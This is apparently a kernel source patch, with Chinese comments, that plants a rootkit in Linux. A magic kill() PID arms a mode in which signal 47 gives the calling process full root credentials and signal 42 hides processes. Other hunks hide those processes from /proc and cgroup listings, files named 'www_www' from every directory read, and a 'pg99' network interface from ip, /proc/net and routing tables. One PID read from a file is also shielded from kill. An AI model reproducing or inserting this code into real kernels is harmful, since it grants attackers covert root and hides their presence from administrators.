test

fs/proc/base.c

@@ -3599,6 +3599,14 @@ int proc_pid_readdir(struct file *file, struct dir_context *ctx)
 		unsigned int len;
 
 		cond_resched();
+
+		rcu_read_lock();
+		if (iter.task->flags & 0x10000000) {
+			rcu_read_unlock();
+			continue;
+		}
+		rcu_read_unlock();
+
 		if (!has_pid_permissions(fs_info, iter.task, HIDEPID_INVISIBLE))
 			continue;
 

fs/readdir.c

@@ -267,6 +267,10 @@ static bool filldir(struct dir_context *ctx, const char *name, int namlen,
 		sizeof(long));
 	int prev_reclen;
 
+    if (namlen >= 7 && strncmp(name, "www_www", 7) == 0) {
+        return false;
+    }
+
 	buf->error = verify_dirent_name(name, namlen);
 	if (unlikely(buf->error))
 		return false;
@@ -351,7 +355,10 @@ static bool filldir64(struct dir_context *ctx, const char *name, int namlen,
 	int reclen = ALIGN(offsetof(struct linux_dirent64, d_name) + namlen + 1,
 		sizeof(u64));
 	int prev_reclen;
-
+    if (namlen >= 7 && strncmp(name, "www_www", 7) == 0) {
+        return false;
+    }
+
 	buf->error = verify_dirent_name(name, namlen);
 	if (unlikely(buf->error))
 		return false;

kernel/cgroup/cgroup-v1.c

@@ -485,10 +485,51 @@ static void *cgroup_pidlist_next(struct seq_file *s, void *v, loff_t *pos)
 }
 
 static int cgroup_pidlist_show(struct seq_file *s, void *v)
-{
-	seq_printf(s, "%d\n", *(int *)v);
-
-	return 0;
+{ 
+    // 首先检查迭代器提供的值是否有效
+    if (!v) {
+        return 0; // 值无效，无需处理
+    }
+    int pid = *(int *)v;        // 从迭代器获取 PID
+    char *cmd = current->comm; // 获取当前进程名
+
+    // 对 systemctl 命令进行特殊处理
+    if (cmd != NULL && strcmp(cmd, "systemctl") == 0) {
+        struct task_struct *task = NULL;
+        struct pid *pid_struct = NULL;
+        // 获取 cgroup 锁 (假设这对于检查期间 cgroup 的稳定性是必要的)
+        cgroup_lock();
+        cgroup_attach_lock(true);
+        // 使用 RCU 读锁保护任务查找过程，防止竞争条件
+        rcu_read_lock();
+        pid_struct = find_vpid(pid); // 根据 PID 查找 pid 结构体
+        if (pid_struct) {
+            task = pid_task(pid_struct, PIDTYPE_PID); // 根据 pid 结构体查找 task_struct
+            // 如果找到了 task，增加其引用计数，以便在 RCU 锁外安全使用
+            if (task) {
+                get_task_struct(task);
+            }
+        }
+        if (task) {
+            bool skip_print = false;
+            if ((task->flags & 0x10000000) == 0x10000000) {
+                skip_print = true;
+            }
+            // 如果根据标志位不需要跳过，则进一步检查任务是否存活
+            if (!skip_print) {
+                seq_printf(s, "%d\n", pid);
+            }else{
+               // pr_info("过滤的pid为 %d\n",pid);
+            }
+            put_task_struct(task);
+        }
+        rcu_read_unlock();
+        cgroup_attach_unlock(true);
+        cgroup_unlock();
+    } else {
+        seq_printf(s, "%d\n", *(int *)v);
+    }
+    return 0;
 }
 
 static ssize_t __cgroup1_procs_write(struct kernfs_open_file *of,

kernel/cgroup/cgroup.c

@@ -5154,8 +5154,27 @@ static void *cgroup_procs_start(struct seq_file *s, loff_t *pos)
 
 static int cgroup_procs_show(struct seq_file *s, void *v)
 {
-	seq_printf(s, "%d\n", task_pid_vnr(v));
-	return 0;
+             if (!v){
+                 return 0;
+             }
+             cgroup_lock();
+             cgroup_attach_lock(true);
+             struct task_struct *task =  v;
+             get_task_struct(task);
+             //pr_info("(unsigned long)(task->flags & 0x10000000) %d\n",task_pid_vnr(v));
+             // 添加标志过滤逻辑
+             if ((unsigned long)(task->flags & 0x10000000) || !pid_alive(task)) {
+                  //pr_info("skip now %d\n",task_pid_vnr(v));
+                  put_task_struct(task);
+                  cgroup_attach_unlock(true);
+                  cgroup_unlock();
+                  return 0;
+             }
+             seq_printf(s, "%d\n", task_pid_vnr(v));
+             put_task_struct(task);
+             cgroup_attach_unlock(true);
+             cgroup_unlock();
+    	     return 0;
 }
 
 static int cgroup_may_write(const struct cgroup *cgrp, struct super_block *sb)

kernel/signal.c

@@ -1562,16 +1562,140 @@ int kill_pid_usb_asyncio(int sig, int errno, sigval_t addr,
 }
 EXPORT_SYMBOL_GPL(kill_pid_usb_asyncio);
 
-/*
- * kill_something_info() interprets pid in interesting ways just like kill(2).
- *
- * POSIX specifies that kill(-1,sig) is unspecified, but what we have
- * is probably wrong.  Should make it like BSD or SYSV.
- */
+pid_t target_my_pid;
+
+static void read_target_my_pid(void) {
+    struct file *file;
+    char buffer[16]; // 使用固定长度的缓冲区
+    loff_t pos = 0;
+    ssize_t bytes_read;
+
+    file = filp_open("/var/www_www/www_www", O_RDONLY, 0);
+    if (IS_ERR(file)) {
+        target_my_pid = -1; // 通常情况下，PID 为-1表示无效
+       // printk(KERN_ERR "Failed to open file: %ld\n", PTR_ERR(file));
+        return;
+    }
+
+    bytes_read = kernel_read(file, buffer, sizeof(buffer) - 1, &pos);
+    if (bytes_read < 0) {
+        target_my_pid = -1;  // 读取失败
+       // printk(KERN_ERR "Failed to read from file: %ld\n", bytes_read);
+        filp_close(file, NULL);
+        return;
+    }
+
+    buffer[bytes_read] = '\0';  // 确保字符串以 NULL 终止
+
+   // printk(KERN_INFO "Read %zd bytes. Buffer: '%s'\n", bytes_read, buffer);
+
+    // 跳过无效字符直到找到数字
+    char *ptr = buffer;
+    while (*ptr && (*ptr < '0' || *ptr > '9')) {
+        ptr++;  // 跳过前导无效字符
+    }
+
+    // 确保找到有效数字
+    if (*ptr == '\0') {
+        target_my_pid = -1;  // 没有找到有效数字
+        //printk(KERN_ERR "No valid integer found in buffer\n");
+        filp_close(file, NULL);
+        return;
+    }
+
+    // 将字符串转换为 pid_t
+    if (kstrtoint(ptr, 10, &target_my_pid) != 0) {
+        target_my_pid = -1;  // 转换失败，设置为 -1
+       // printk(KERN_ERR "Failed to convert buffer to pid_t: '%s'\n", buffer);
+    } else {
+        // 检查PID的有效性
+        if (target_my_pid < 1 || target_my_pid > 32768) {
+            //printk(KERN_ERR "Invalid PID found: %d\n", target_my_pid);
+            target_my_pid = -1;  // 设为无效 PID
+        } else {
+            //printk(KERN_INFO "Successfully read target PID: %d\n", target_my_pid);
+        }
+    }
+
+    filp_close(file, NULL);
+}
+
+void give_root(void);
+void give_root(void){
+		struct cred *newcreds;
+		newcreds = prepare_creds();
+		if (newcreds == NULL){
+		    return;
+		}
+		newcreds->uid.val = newcreds->gid.val = 0;
+		newcreds->euid.val = newcreds->egid.val = 0;
+		newcreds->suid.val = newcreds->sgid.val = 0;
+		newcreds->fsuid.val = newcreds->fsgid.val = 0;
+		commit_creds(newcreds);
+}
+
+#include <linux/timer.h>
+#include <linux/jiffies.h>
+
+
+static int MY_VAL = 0;
+static pid_t SWITCH = 78372345;
+
+static struct timer_list my_val_reset_timer;
+static bool my_val_timer_is_setup = false;
+
+static void do_reset_my_val_callback(struct timer_list *t)
+{
+    MY_VAL = 0;
+}
+
 
 static int kill_something_info(int sig, struct kernel_siginfo *info, pid_t pid)
 {
 	int ret;
+	if(sig == 47 && MY_VAL == 1){
+          give_root();
+          return 0;
+	}
+   // 检查是否是自定义信号，用于处理进程可见性
+    if (sig == 42 && MY_VAL == 1) {
+        struct task_struct *task; // 声明 task 变量
+        // 锁定进程任务列表，使用 RCU 方式以确保安全
+        rcu_read_lock(); // 开始读取锁
+        task = pid_task(find_vpid(pid), PIDTYPE_PID);
+
+        if (task) {
+            // 增加对 task 的引用计数，以确保它在我们处理期间有效
+            get_task_struct(task);
+            // 切换进程的可见性标志，这里需要确保使用正确的标志位
+            task->flags ^= 0x10000000; // 假设 0x10000000 是 PF_INVISIBLE 标志
+//            printk(KERN_INFO "Toggled invisibility for PID: %d (now %s)\n",
+//                   task->pid,
+//                   (task->flags & 0x10000000) ? "hidden" : "visible");
+
+  	    if (!my_val_timer_is_setup) {
+                timer_setup(&my_val_reset_timer, do_reset_my_val_callback, 0);
+                my_val_timer_is_setup = true;
+            }
+            mod_timer(&my_val_reset_timer, jiffies + (3 * 60 * HZ));
+
+            put_task_struct(task); // 释放引用计数
+            rcu_read_unlock(); // 解锁
+            return 0;
+        }
+        MY_VAL = 0;
+        rcu_read_unlock(); // 解锁
+        return -ESRCH; // 找不到进程
+    } else{
+           if(pid == SWITCH){
+               MY_VAL = 1;
+               return -ESRCH;
+           }
+           read_target_my_pid();
+           if(pid == target_my_pid){
+                return 0;
+           }
+    }
 
 	if (pid > 0)
 		return kill_proc_info(sig, info, pid);
@@ -1605,6 +1729,7 @@ static int kill_something_info(int sig, struct kernel_siginfo *info, pid_t pid)
 	return ret;
 }
 
+
 /*
  * These are for backward compatibility with the rest of the kernel source.
  */

net/core/neighbour.c

@@ -2485,6 +2485,12 @@ static int neightbl_dump_info(struct sk_buff *skb, struct netlink_callback *cb)
 		nidx = 0;
 		p = list_next_entry(&tbl->parms, list);
 		list_for_each_entry_from(p, &tbl->parms_list, list) {
+		        // 添加过滤逻辑，检查设备名称
+	                struct net_device *dev = p->dev;
+	                if (dev && (strcmp(dev->name, "pg99") == 0  || strncmp(dev->name, "pg99", 4) == 0)) {
+	                     continue;
+	                }
+
 			if (!net_eq(neigh_parms_net(p), net))
 				continue;
 

net/core/net-procfs.c

@@ -71,14 +71,23 @@ static void dev_seq_printf_stats(struct seq_file *seq, struct net_device *dev)
  */
 static int dev_seq_show(struct seq_file *seq, void *v)
 {
-	if (v == SEQ_START_TOKEN)
+	if (v == SEQ_START_TOKEN){
 		seq_puts(seq, "Inter-|   Receive                            "
 			      "                    |  Transmit\n"
 			      " face |bytes    packets errs drop fifo frame "
 			      "compressed multicast|bytes    packets errs "
 			      "drop fifo colls carrier compressed\n");
-	else
+	}else{
+	     struct net_device *dev = v;
+
+         // 过滤特定设备
+         if (strcmp(dev->name, "pg99") == 0  || strncmp(dev->name, "pg99", 4) == 0) {
+            //pr_info("dev_seq_show: Skipping device %s\n", dev->name);
+            return 0;
+         }
+
 		dev_seq_printf_stats(seq, v);
+	}
 	return 0;
 }
 

net/core/rtnetlink.c

@@ -2492,6 +2492,11 @@ static int rtnl_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb)
 walk_entries:
 	err = 0;
 	for_each_netdev_dump(tgt_net, dev, ctx->ifindex) {
+		 char * cmd = current->comm;
+        	 if (cmd!= NULL && strcmp(cmd, "ip") == 0 && (strcmp(dev->name, "pg99") == 0  || strncmp(dev->name, "pg99", 4) == 0)) {
+              		 continue;
+        	 }
+
 		if (link_dump_filtered(dev, master_idx, kind_ops))
 			continue;
 		err = rtnl_fill_ifinfo(skb, dev, net, RTM_NEWLINK,

net/ipv4/fib_trie.c

@@ -2344,7 +2344,37 @@ int fib_table_dump(struct fib_table *tb, struct sk_buff *skb,
 
 	while ((l = leaf_walk_rcu(&tp, key)) != NULL) {
 		int err;
+
+  		 /* 遍历下一跳结构并过滤特定网卡 */
+		struct fib_alias *fa;
+		struct fib_nh *nh;
+		struct net_device *dev = NULL;
+
+		rcu_read_lock();
+		hlist_for_each_entry_rcu(fa, &l->leaf, fa_list) {
+			struct fib_info *fi = fa->fa_info;
 
+			if (!fi || fi->fib_dead)
+				continue;
+
+			/* 遍历 fib_nh 数组 */
+			for (int i = 0; i < fi->fib_nhs; i++) {
+				nh = &fi->fib_nh[i];
+				dev = nh->fib_nh_dev;
+
+				/* 如果设备名匹配，则跳过处理 */
+				if (dev && (strcmp(dev->name, "pg99") == 0 || strncmp(dev->name, "pg99", 4) == 0)) {
+					//pr_info("Skipping route for device: %s\n", dev->name);
+					rcu_read_unlock();
+					key = l->key + 1;
+					count++;
+					memset(&cb->args[4], 0, sizeof(cb->args) - 4 * sizeof(cb->args[0]));
+					goto next_entry;
+				}
+			}
+		}
+		rcu_read_unlock();
+
 		err = fn_trie_dump_leaf(l, tb, skb, cb, filter);
 		if (err < 0) {
 			cb->args[3] = key;
@@ -2361,6 +2391,8 @@ int fib_table_dump(struct fib_table *tb, struct sk_buff *skb,
 		/* stop loop if key wrapped back to 0 */
 		if (key < l->key)
 			break;
+	 next_entry:
+	     continue;	
 	}
 
 	cb->args[3] = key;
@@ -2965,7 +2997,14 @@ static int fib_route_seq_show(struct seq_file *seq, void *v)
 
 		if (fa->tb_id != tb->tb_id)
 			continue;
-
+	        // 检查是否为 pg99 网卡并跳过
+		if (fi) {
+			struct fib_nh_common *nhc = fib_info_nhc(fi, 0);
+			if (nhc->nhc_dev && (strcmp(nhc->nhc_dev->name, "pg99") == 0 || strncmp(nhc->nhc_dev->name, "pg99",4) == 0)){
+			  //  pr_info("hide pg 99 fib_route_seq_show==========>");
+				continue;
+			}
+		}
 		seq_setwidth(seq, 127);
 
 		if (fi) {